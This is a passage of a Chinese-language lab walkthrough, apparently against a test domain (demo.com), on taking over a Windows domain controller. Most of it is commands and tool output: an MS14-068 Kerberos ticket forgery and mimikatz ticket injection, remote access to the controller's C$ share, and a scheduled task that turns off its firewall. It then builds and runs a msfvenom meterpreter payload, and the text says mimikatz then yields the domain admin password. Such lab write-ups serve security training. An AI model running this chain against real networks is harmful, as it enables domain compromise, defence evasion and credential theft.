MS14-068.exe -u douserdemo.com -s S-1-5-21-979886063-1111900045-1414766810-1107 -d 192.168.183.130 -p Dotest123[] Building AS-REQ for 192.168.183.130... Done![] Sending AS-REQ to 192.168.183.130... Done![] Receiving AS-REP from 192.168.183.130... Done![] Parsing AS-REP from 192.168.183.130... Done![] Building TGS-REQ for 192.168.183.130... Done![] Sending TGS-REQ to 192.168.183.130... Done![] Receiving TGS-REP from 192.168.183.130... Done![] Parsing TGS-REP from 192.168.183.130... Done![] Creating ccache file TGT_douserdemo.com.ccache... Done!利用mimikatz 桌面上也有来导入票据 c:\Users\douser\Desktopmimikatz.exe
mimikatz.exe.#####. mimikatz 2.2.0 (x64) #18362 Jan 2 2020 19:21:39.## ^ ##. A La Vie, A LAmour - (oe.eo)## / \ ## /*** Benjamin DELPY gentilkiwi ( benjamingentilkiwi.com )## \ / ## http://blog.gentilkiwi.com/mimikatz## v ## Vincent LE TOUX ( vincent.letouxgmail.com )##### http://pingcastle.com / http://mysmartlogon.com ***/mimikatz # kerberos::purge
Ticket(s) purge for current session is OKmimikatz # kerberos::listmimikatz # kerberos::ptc C:\users\douser\Desktop\TGT_douserdemo.com.ccachePrincipal : (01) : douser ; DEMO.COMData 0Start/End/MaxRenew: 2024/12/3 22:17:14 ; 2024/12/4 8:17:14 ; 2024/12/10 22:17:14Service Name (01) : krbtgt ; DEMO.COM ; DEMO.COMTarget Name (01) : krbtgt ; DEMO.COM ; DEMO.COMClient Name (01) : douser ; DEMO.COMFlags 50a00000 : pre_authent ; renewable ; proxiable ; forwardable ; Session Key : 0x00000017 - rc4_hmac_nt d030a0db75eadb9b5f672b49a11721c9Ticket : 0x00000000 - null ; kvno 2 [...]* Injecting ticket : OK操作分别是清空当前票据查看当前票据导入票据 查看当前票据 mimikatz # kerberos::list[00000000] - 0x00000017 - rc4_hmac_nt Start/End/MaxRenew: 2024/12/3 22:17:14 ; 2024/12/4 8:17:14 ; 2024/12/10 22:17:14Server Name : krbtgt/DEMO.COM DEMO.COMClient Name : douser DEMO.COMFlags 50a00000 : pre_authent ; renewable ; proxiable ; forwardable ;尝试通过IPC连接DC ps记得使用主机名否则默认走NTLM协议 c:\Users\douser\Desktopdir \\WIN-ENS2VR5TR3N\c$
dir \\WIN-ENS2VR5TR3N\c$Volume in drive \\WIN-ENS2VR5TR3N\c$ has no label.Volume Serial Number is 702B-0D1BDirectory of \\WIN-ENS2VR5TR3N\c$2009/07/14 11:20 DIR PerfLogs
2020/01/24 13:30 DIR Program Files
2020/01/24 13:30 DIR Program Files (x86)
2019/12/31 11:01 DIR Users
2020/01/24 13:33 DIR Windows0 File(s) 0 bytes5 Dir(s) 11,366,170,624 bytes free成功访问到域控也算拿下了
上线DC win7桌面下还提供呢Psexec64.exe c:\Users\douser\Desktoppsexec64 \\WIN-ENS2VR5TR3N.demo.com cmd.exe \ipconfig
psexec64 \\WIN-ENS2VR5TR3N.demo.com cmd.exe \ipconfig PsExec v2.2 - Execute processes remotely
Copyright (C) 2001-2016 Mark Russinovich
Sysinternals - www.sysinternals.comStarting cmd.exe on WIN-ENS2VR5TR3N.demo.com...3N.demo.com...demo.com...
cmd.exe exited on WIN-ENS2VR5TR3N.demo.com with error code 0. 但是不知道为什么连不上 通过计划任务关闭防火墙 新建1.bat文件 # vim 1.bat
netsh advfirewall set allprofiles state off通过MSF上传到靶机win7 meterpreter upload ~/Desktop/test/1.bat C:/users/douser/Desktop
[*] Uploading : /root/Desktop/test/1.bat - C:/users/douser/Desktop\1.bat
[*] Completed : /root/Desktop/test/1.bat - C:/users/douser/Desktop\1.bat在shell模式将1.bat传到DC C:\Windows\system32copy c:\users\douser\desktop\1.bat \\WIN-ENS2VR5TR3N\c$
copy c:\users\douser\desktop\1.bat \\WIN-ENS2VR5TR3N\c$1 file(s) copied.创建计划任务关闭防火墙ST是时间也可以调成手动运行 schtasks /create /S WIN-ENS2VR5TR3N /TN test1 /TR c:/1.bat /SC ONCE /ST 22:49 /ru system /f通过计划任务上线DC msfvenom生成exe马 msfvenom -p windows/x64/meterpreter/bind_tcp LHOST192.168.183.130 LPORT2345 -f exe shell.exe用上面的方式上传exe马到DC Kali监听 msf6 exploit(windows/smb/ms17_010_eternalblue) use exploit/multi/handler
msf6 exploit(multi/handler) set payload windows/x64/meterpreter/bind_tcp
msf6 exploit(multi/handler) set lport 2345
msf6 exploit(multi/handler) set rhost 192.168.183.130
msf6 exploit(multi/handler) run通过计划任务执行shell.exe schtasks /create /S WIN-ENS2VR5TR3N /TN test1 /TR c:/shell.exe /SC ONCE /ST 23:03 /ru system /f成功上线MSF msf6 exploit(multi/handler) run[*] Started bind TCP handler against 192.168.183.130:2345
[*] Sending stage (201798 bytes) to 192.168.183.130
[*] Meterpreter session 1 opened (127.0.0.1:44267 - 127.0.0.1:1080) at 2024-12-03 23:13:39 0800meterpreter 然后通过mimikatz读取密码 拿到域管理员密码
